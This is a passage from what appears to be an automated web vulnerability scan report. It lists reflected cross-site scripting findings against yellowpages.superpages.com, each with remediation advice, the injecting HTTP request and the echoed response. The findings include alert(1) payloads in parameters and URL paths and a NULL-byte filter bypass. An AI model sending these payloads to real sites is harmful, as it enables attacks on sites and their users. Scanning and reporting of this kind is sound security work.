Path:   /listings.jsp

Issue detail

The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 03 Feb 2011 17:10:53 GMT
Connection: close


<!--

-->


                                                                        <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="ht
...[SNIP]...
<div title=java.lang.String>javax.servlet.forward.query_string=C=florists%00e5acd<script>alert(1)</script>93fce6bf183</div>
...[SNIP]...

1.639. http://yellowpages.superpages.com/listings.jsp [C parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57369
Date: Thu, 03 Feb 2011 17:10:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
lines. */
/* 09-04-08: CMM New logic to track errors via Omniture. */
s.pageName= "Error Page Try Again";
s.pageType = "errorPage";
s.prop35 = "???omniture.error.tracking.NLF???";
s.prop39 = "floristsb00f4";alert(1)//9ea80311ee5";
s.prop6 = "Dallas";
s.prop7 = "TX";
s.prop8 = "";
s.eVar10 = "Dallas TX";
var s_code=s.t();
if(s_code)
document.write(s_code);
//-->
...[SNIP]...

1.640. http://yellowpages.superpages.com/listings.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /listings.jsp277d5&quot;-alert(1)-&quot;5f0b41eeee6
Server: Unspecified
Set-Cookie: JSESSIONID=8E53E473DA04106852BE1CA9427A533A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:10:16 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56970
Date: Thu, 03 Feb 2011 17:10:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ges.com';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.642. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /mapbasedsearch/mapsearch.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /mapbasedsearch443ae&quot;-alert(1)-&quot;9a43d5cbd11/mapsearch.jsp
Server: Unspecified
Set-Cookie: JSESSIONID=BBEB9F1133B421096148BD47E50E8096; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:00 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.643. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /mapbasedsearch/mapsearch.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /mapbasedsearch/mapsearch.jspdd6e6&quot;-alert(1)-&quot;4f9032749d1
Server: Unspecified
Set-Cookie: JSESSIONID=6A56F54F7F3562CEA77C1D9E1165869B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:15 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.644. http://yellowpages.superpages.com/profile.jsp [LID%3D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56887
Date: Thu, 03 Feb 2011 17:10:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
om';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.645. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profile.jspc50ad&quot;-alert(1)-&quot;eb234e6d437
Server: Unspecified
Set-Cookie: JSESSIONID=4BAED70D8FFB9064D8585BBF87B9B20C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:10:27 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32667
Date: Thu, 03 Feb 2011 17:10:08 GMT
Connection: close


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.647. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a3b"-alert(1)-"f68d6ca10b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profiler88a3b&quot;-alert(1)-&quot;f68d6ca10b2/abook.jsp
Server: Unspecified
Set-Cookie: JSESSIONID=55AB36387FFC53A62D516A7528117702; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:42 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
v = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profiler88a3b"-alert(1)-"f68d6ca10b2/abook.jsp?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.648. http://yellowpages.superpages.com/profiler/abook.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f26e"-alert(1)-"c50d8f06cd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profiler/abook.jsp8f26e&quot;-alert(1)-&quot;c50d8f06cd0
Server: Unspecified
Set-Cookie: JSESSIONID=3509911F0F012E3B5DB1A7C0CB989815; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:53 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
//yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp8f26e"-alert(1)-"c50d8f06cd0?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.649. http://yellowpages.superpages.com/profiler/abook.jsp [couponsLoc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of the couponsLoc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64010"-alert(1)-"1a4a0871ee5 was submitted in the couponsLoc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=53B85B4145F5F86D79C967AF60B8C824; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64285
Date: Thu, 03 Feb 2011 17:11:32 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
m';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCoupons&couponsLoc=64010"-alert(1)-"1a4a0871ee5";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.650. http://yellowpages.superpages.com/profiler/abook.jsp [requestAction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profiler/abook.jsp

Issue detail

The value of the requestAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b54c7"-alert(1)-"f103ef4cee was submitted in the requestAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Pragma: public
Cache-Control: max-age=0
Set-Cookie: JSESSIONID=B8EF79737E86E1212341473A6B416604; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 64190
Date: Thu, 03 Feb 2011 17:10:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profiler/abook.jsp?requestAction=toCouponsb54c7"-alert(1)-"f103ef4cee";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

1.651. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload daf46"-alert(1)-"5c6fb56425b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviewsdaf46&quot;-alert(1)-&quot;5c6fb56425b/js/ajaxreviews.js
Server: Unspecified
Set-Cookie: JSESSIONID=8C8FB1AE6353FA670702AEA79FA748ED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:45 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
rv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviewsdaf46"-alert(1)-"5c6fb56425b/js/ajaxreviews.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.652. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbcb3"-alert(1)-"62acf7edf87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/jsdbcb3&quot;-alert(1)-&quot;62acf7edf87/ajaxreviews.js
Server: Unspecified
Set-Cookie: JSESSIONID=F0D826CA6507947C1A8E9F5CFFA2E340; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:34:54 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/jsdbcb3"-alert(1)-"62acf7edf87/ajaxreviews.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.653. http://yellowpages.superpages.com/reviews/js/ajaxreviews.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/ajaxreviews.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16b42"-alert(1)-"90ac00c6709 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /reviews/js/ajaxreviews.js16b42&quot;-alert(1)-&quot;90ac00c6709
Server: Unspecified
Set-Cookie: JSESSIONID=0F2C1426EA2D2BBFB71984CD0E56C453; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:35:03 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/reviews/js/ajaxreviews.js16b42"-alert(1)-"90ac00c6709?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

1.654. http://yellowpages.superpages.com/reviews/js/logclick.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /reviews/js/logclick.js

Issue detail

